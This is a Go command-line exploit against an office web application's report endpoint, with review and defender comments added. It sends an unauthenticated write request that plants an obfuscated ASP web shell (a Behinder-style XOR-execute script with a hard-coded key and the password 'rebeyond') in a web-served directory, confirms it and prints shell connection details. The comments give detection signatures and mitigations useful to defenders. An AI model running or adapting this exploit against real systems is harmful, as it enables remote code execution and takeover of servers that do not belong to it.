package main
import (
"crypto/tls"
"fmt"
"github.com/hpifu/go-kit/hflag"
"github.com/imroc/req/v3"
"github.com/liushuochen/gotable"
"github.com/thanhpk/randstr"
"log"
"net/http"
"os"
"strings"
"time"
)
// main runs one upload attempt against the address given on the command line
// and reports the elapsed wall-clock time.
//
// NOTE(review): uploader returns nothing, so the closing "GetShell" line is
// printed unconditionally, including after a failed run. The output of this
// tool is therefore not evidence that a host was actually affected.
func main() {
	started := time.Now()
	target := getParam()
	uploader(target)
	elapsed := time.Since(started).String()
	fmt.Printf("[√] 速度还是挺快的就这么点时间%s就GetShell了.", elapsed)
}
// getParam registers the required "target" flag (shorthand "t"), parses the
// command line and returns the flag's value.
//
// The value is returned as-is: no scheme, host or path validation is done
// here, and the caller concatenates it straight into request URLs.
//
// NOTE(review): a parse failure prints the usage text and exits with status 0,
// so a calling script cannot tell a bad invocation from a normal exit.
func getParam() string {
	hflag.AddFlag("target", "海翔地址", hflag.Required(), hflag.Shorthand("t"))
	if parseErr := hflag.Parse(); parseErr != nil {
		usage := hflag.Usage()
		fmt.Println(usage)
		os.Exit(0)
	}
	target := hflag.GetString("target")
	return target
}
// reqClient builds the HTTP client used for both requests: automatic body
// decoding for all content types, redirects not followed, a 15 second
// timeout, and a Safari TLS fingerprint.
//
// Security notes:
//   - InsecureSkipVerify disables certificate validation, so the client cannot
//     authenticate the host it talks to; any on-path party can answer in the
//     target's place and the status codes checked by the caller can be spoofed.
//   - MinVersion allows TLS 1.0, a deprecated protocol version.
//   - Because the client presents a browser TLS fingerprint, TLS-fingerprint
//     based detection alone is unlikely to single out this traffic; the request
//     path and query string are the more reliable signal.
//   - NOTE(review): TLSClientConfig is assigned after SetTLSFingerprintSafari();
//     whether the manual config interferes with the fingerprint setting is not
//     visible from this file — confirm against the req library.
func reqClient() *req.Client {
	tlsCfg := &tls.Config{
		InsecureSkipVerify: true,
		MinVersion:         tls.VersionTLS10,
		MaxVersion:         tls.VersionTLS13,
	}

	c := req.C()
	c.SetAutoDecodeAllContentType()
	c.SetRedirectPolicy(req.NoRedirectPolicy())
	c.SetTimeout(15 * time.Second)
	c.SetTLSFingerprintSafari()
	// Keep the assignment after the fingerprint call, as in the original order.
	c.TLSClientConfig = tlsCfg
	return c
}
// uploader sends one POST that asks the target's report endpoint to write the
// request body to a file, then issues a GET for that file and prints a
// connection table when the GET does not return 404.
//
// What the code shows about the weakness being exercised:
//   - The endpoint /ioffice/prg/set/report/iorepsavexml.aspx is called with
//     key=writefile and caller-chosen filename and filepath query parameters.
//   - The chosen filename ends in ".asp" and the chosen directory is
//     /upfiles/rep/pic/, which is then fetched over HTTP; i.e. the server is
//     expected to store an attacker-named script file in a web-served directory.
//   - No credentials, cookies or tokens are set on the request by this code,
//     so the write is presumably accepted without authentication — confirm
//     against the affected product.
//
// Defender notes (derived from the values in this function):
//   - Detection: look in web/proxy logs for POST requests to
//     iorepsavexml.aspx carrying key=writefile, and for new *.asp files with
//     random hex names under /ioffice/upfiles/rep/pic/.
//   - Content signature: the stored file contains the static key string
//     k="e45e329feb5d925b" and ends in execute(result); the table printed below
//     labels it as a 冰蝎 (Behinder) shell with password "rebeyond".
//   - Mitigation: restrict access to the report endpoint, reject script
//     extensions and caller-supplied paths server-side, and disable script
//     execution for the upload directory.
//
// Parameters:
//   target - base address as supplied on the command line, used unvalidated.
func uploader(target string) {
// Random hex file name with an .asp extension; differs on every run, so the
// name itself is not a stable indicator, only its location and extension.
shellName := randstr.Hex(8) + ".asp"
// ASP script written to the server: it reads the raw request body, XORs it
// byte-by-byte with the 16-character key k, and passes the result to execute().
shellString := "<%\nResponse.CharSet = \"UTF-8\" \nk=\"e45e329feb5d925b\" \nSession(\"k\")=k\nsize=Request.TotalBytes\ncontent=Request.BinaryRead(size)\nFor i=1 To size\nresult=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))\nNext\nexecute(result)\n%>\n"
// The Replace collapses the first "//io" into "/io", which handles a target
// that was given with a trailing slash.
vulUrl := strings.Replace(target+"/ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename="+shellName+"&filepath=/upfiles/rep/pic/", "//io", "/io", 1)
client := reqClient()
post, err := client.R().SetBody(shellString).Post(vulUrl)
if err != nil {
log.Println(err)
return
}
defer func() {
_ = post.Body.Close()
}()
// Only the status code is inspected; the response body is never read, so a
// 200 from an error page or an intermediary counts as success here.
if post.StatusCode != http.StatusOK {
fmt.Println("GetShell Failed")
return
}
shellURL := strings.Replace(target+"/ioffice/upfiles/rep/pic/"+shellName, "//io", "/io", 1)
// NOTE(review): the error is discarded; if the request fails and get is nil,
// the StatusCode access on the next line panics.
get, _ := client.R().Get(shellURL)
// Any status other than 404 (for example 403 or 500) is treated as a
// confirmed write, so the printed table can be a false positive.
if get.StatusCode != http.StatusNotFound {
create, _ := gotable.Create("Shell连接工具", "Shell连接地址", "Shell连接密码")
_ = create.AddRow([]string{
"冰蝎", shellURL, "rebeyond",
})
fmt.Println(create)
}
// NOTE(review): this defer is registered only after get has already been
// dereferenced above, so it does not protect against the nil case.
defer func() {
_ = get.Body.Close()
}()
}